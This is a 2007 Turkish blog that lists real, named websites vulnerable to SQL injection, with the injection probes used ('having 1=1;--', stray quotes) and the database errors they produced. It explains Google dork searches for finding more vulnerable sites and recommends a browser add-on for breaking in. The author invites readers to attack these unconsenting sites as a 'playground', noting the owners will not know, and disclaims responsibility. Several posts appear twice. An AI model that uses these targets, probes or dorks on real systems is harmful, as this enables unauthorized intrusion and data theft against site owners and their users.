19 Temmuz 2007 Perşembe
Sql sızma( injection) için gerçek siteleri nereden bulacağım?
Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen
burayı tıklayın.
Google araması ile sql test sitesi
http://www.driverara.org/sorudetay.asp?id=4715%27 having 1=1;--
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'soru.cat' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/sorudetay.asp, line 72
Google araması ile sql test sitesi
http://www.prc.gov/dockets.asp?ID=R2006-1'
Sunucu:Oracle
Hata:
Sunucu:Oracle
Hata:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Oracle][ODBC][Ora]ORA-01756: quoted string not properly terminated
/dockets.asp, line 41
http://www.trb.org/news/blurb_detail.asp?id=2326'
Sql sızma denemeleri...
Sql injection
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ',','.
/news/blurb_detail.asp, line 24
Sql sızma denemeleri...
Sql injection
Google araması ile sql test sitesi
id=25013 having 1=1
http://www.aiim.org/standards.asp?id=25013%20having%201=1
http://www.aiim.org/standards.asp?id=25013%20having%201=1
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'vwwebarticles.ProductID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/GetArticle.asp, line 101
17 Temmuz 2007 Salı
Çözüm
Adres: http://www.xxx.com/default.asp?id=15 having 1=1;--
Hata:
http://www.xxx.com/default.asp?id=15' having 1=1;--
Kaynak:http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=243810&SiteID=1
Alıntı:
Hata:
Çözüm:Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '15 having 1=1;--' to a column of data type int.
/default.asp, line 61
http://www.xxx.com/default.asp?id=15' having 1=1;--
Kaynak:http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=243810&SiteID=1
Alıntı:
- Syntax error converting the varchar value 'a' to a column of data type intI have a table(tab1) with a column(col1) of type varchar. I insert a row with an integer value(1). And when i query the table using the sql, select col1 from tab1 where col1 = 1, it works fine.
But after i insert a varchar, say 'a' and then do the same query, i get an error message saying, "Syntax error converting the varchar value 'a' to a column of data type int.". Why is this so? Please reply.
- Try select col1 from tab1 where col1 = '1'
The ' around the 1 tells SQL server it is comparing the charater 1 not the number 1
15 Temmuz 2007 Pazar
Google araması ile sql test için site bulma
http://www.google.com.tr/search?q=inurl:"asp?id="
Arama kutusuna inurl:"asp?id=" veya inurl:"php?id=" vs. anahtar ifadeleriyle kendiniz için bir test ortamı sunacak site bulabilirsiniz.
Tabi sitenin sahibinin bu testi sunduğundan haberi olmayacak başka
inurl:"asp?%id%=0..999999"
http://www.google.com.tr/search?hl=tr&q=inurl%3A%22asp%3F%25id%25%3D0..999999
Arama kutusuna inurl:"asp?id=" veya inurl:"php?id=" vs. anahtar ifadeleriyle kendiniz için bir test ortamı sunacak site bulabilirsiniz.
Tabi sitenin sahibinin bu testi sunduğundan haberi olmayacak başka
inurl:"asp?%id%=0..999999"
http://www.google.com.tr/search?hl=tr&q=inurl%3A%22asp%3F%25id%25%3D0..999999
http://www.hayatiminhatasi.com
http://www.hayatiminhatasi.com
Üye giriş ekranında bariz hata var. Biraz kurcaladıktan sonra site sahibine ve üyelerine iletmek gerekli :D
Üye giriş ekranında bariz hata var. Biraz kurcaladıktan sonra site sahibine ve üyelerine iletmek gerekli :D
http://www.onlineyayin.net/tv_yayin.asp?id
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-4.0.23a]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
/inc_sayac.asp, line 33
http://www.cnbce.com/dizi.asp?ID=3 having 1=1
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'Serials.SerialID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/dizi.asp, line 13
HackBar 1.1.1 Firefox eklentisi
HackBar bir firefox eklentisi, sql ile sitelere sızarken, sizi site adresiyle boşlukları kaldırmaktan, gerekli fonksiyonları aramaktan vs. kurtarıyor. Çok kullanışlı bir eklentiBu adresten inceleyebilirsiniz ve indirebilirsiniz.
Web developer extension
Bu firefox eklentisi çok işe yarıyor: Cookie silmek, düzenlemek, javascripti, meta redirecti engellemek, form detayları, gizli öğeler...
Sayfanın içini dışını gösteriyor düğmeleriyle size.
Ben http://ferruh.mavituna.com/makale/firefox-eklentileri/ Ferruh Mavituna'nın günlüğünde görmüştüm. Kullandım işe yarıyor.
Sayfanın içini dışını gösteriyor düğmeleriyle size.
Ben http://ferruh.mavituna.com/makale/firefox-eklentileri/ Ferruh Mavituna'nın günlüğünde görmüştüm. Kullandım işe yarıyor.
Aman ha, siteyle ilgim yok. Sadece internette ararken buldum.
Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen
burayı tıklayın.
Sql injection
Sql ile uğraşırken google'da arama yapıp, açığı olan siteleri yayınlıyorum. Gerçek hayatta sitelerde hala açıklar var. Bir çeşit canlı deneme ortamı oluşturuyoeum. Siz de bu günlükten yaralanıp, sitelerde kendinizi sınayabilirsiniz sql ile sızma konusunda.
En baştan söyleyeyim bu siteleri test amaçlı bulup yazıyorum. Oyun parkı gibi bir şey yani...
Siteler üstünde dilediğinizi yapmakta serbestsiniz. Sonuçların tüm sorumluluğu, sitelere sızma girişiminde bulunan arkadaşlarındır. Bu siteleri yayınlayan ben de değil.
Hadi Eyvallah,
Kolay gelsin.
En baştan söyleyeyim bu siteleri test amaçlı bulup yazıyorum. Oyun parkı gibi bir şey yani...
Siteler üstünde dilediğinizi yapmakta serbestsiniz. Sonuçların tüm sorumluluğu, sitelere sızma girişiminde bulunan arkadaşlarındır. Bu siteleri yayınlayan ben de değil.
Hadi Eyvallah,
Kolay gelsin.
Kaydol:
Kayıtlar (Atom)
